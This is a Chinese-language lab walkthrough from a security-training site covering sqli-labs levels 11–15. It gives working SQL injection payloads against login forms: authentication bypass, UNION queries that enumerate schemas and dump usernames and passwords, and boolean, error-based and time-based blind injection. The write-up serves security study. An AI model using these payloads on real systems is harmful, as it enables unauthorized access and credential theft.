当前位置
请选择城市
  • 热门
  • ABCDEFG
  • HIJKL
  • MNOPQRST
  • WXYZ
打造高能级科技创新平台
免费发布任务
免费发布任务
首页 > 藏经阁
SQLI-Less-11-15
网络安全  /  2024-12-19  /  14745浏览

Less-11

此关是Post类型的注入
代码分析
在这里插入图片描述

输入框可以使用密码来登录

username输入admin' or 1=1#,password随便输入一个字符,此处已经被#所注释

在这里插入图片描述使用union进行联合注入

username输入      1' union select 1,database()#password随意字符

在这里插入图片描述
1.查询所有数据库

1admin' union select 1,group_concat(schema_name) from information_schema.schemata#

2.接下来查询表名等

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
3.查询列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述4.查询username,password

-1' union select (select group_concat(username) from users), (select group_concat(password) from users)#

在这里插入图片描述


Less12

代码分析
在这里插入图片描述
payload

1") union select 1,user()##只需把上一关的Payload中的'替换为")即可注入

在这里插入图片描述


Less13

代码分析
在这里插入图片描述
布尔注入(图中打错字了,应该是没有回显,可以使用布尔注入…)

猜测数据库名

admin')and substr(database(),1,1)='s'#

在这里插入图片描述依次往下,使用之前的布尔注入语句

也可以使用报错注入

-1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

在这里插入图片描述



Less14

代码分析
在这里插入图片描述

布尔注入

admin" and substr(database(),1,1)='s'##"闭合,往下的payload只需更换之前布尔注入的"即可

在这里插入图片描述



Less15

代码分析
在这里插入图片描述

1.判断数据库长度

admin' and If(length(database())=8,1,sleep(5))##IF()函数,length(database())=8为判断条件,条件正确执行1,条件错误为sleep(5)

在这里插入图片描述在这里插入图片描述

2.判断数据库名:

admin' and If(substr(database(),1,1)='s',1,sleep(5))--+

剩下的和第九关时间盲注类似第九关时间盲注链接


点赞 0
收藏 0
我要打赏
热点文章
什么是网络安全等级保护
什么是网络安全等级保护
19520阅读
5评论
python编写sqli-labs11关
python编写sqli-labs11关
14774阅读
0评论
SQLI-Less-11-15
SQLI-Less-11-15
14746阅读
0评论
sqli-labs16-20
sqli-labs16-20
14615阅读
0评论
sqli-labs26-32
sqli-labs26-32
14411阅读
0评论
评论0
2000
发布评论
首页 需求大厅 大牛在凤雏 创业基地 云员工 藏经阁 软考试题 CTF挑战赛 白帽服务 入驻院校 企业服务
咨询热线:
09962028123
联系地址
新疆巴州库尔勒市豪景大厦
E-mail
fengchuyunwei@163.com
友情链接:
新疆科技学院官网 山石网科官网 安恒信息官网 网御星云官网 绿盟科技官网 深信服官网 奇安信官网 启明星辰官网 天融信官网 威努特官网 亚信安全官网 360数字安全官网

© 2023-2024 凤雏运维 版权所有,并保留所有权利   新ICP备2021001141号-2

首页
专属客服
发布任务
意见反馈
需求大厅
我的